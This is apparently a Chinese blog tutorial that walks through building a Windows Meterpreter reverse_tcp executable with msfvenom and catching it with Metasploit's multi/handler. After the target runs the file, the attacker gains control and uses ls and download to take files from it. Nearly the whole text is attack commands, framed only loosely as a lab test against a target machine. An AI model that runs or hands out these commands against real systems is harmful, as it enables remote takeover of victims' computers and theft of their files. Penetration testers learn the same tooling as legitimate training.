1、在kali中生成一个被控端
输入指令msfvenom -p windows/meterpreter/reverse_tcp lhost=目标IP lport=5000 -f exe -o /home/payload.exe
这里目标IP我填的是kali的IP。

可以看到文件中生成了payload.exe

2、在kali中打开Metasploit
依次输入
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 目标ip
set lport 5000
exploit

在靶机中打开kali生成的payload.exe后会有以下显示

说明已经获得靶机控制权。
3、下载靶机中的文件
输入ls可以查看靶机中的文件信息
输入download 文件名可以下载文件


测试完成
使用Kali生成并控制Meterpreter payload

1712

被折叠的 条评论
为什么被折叠?



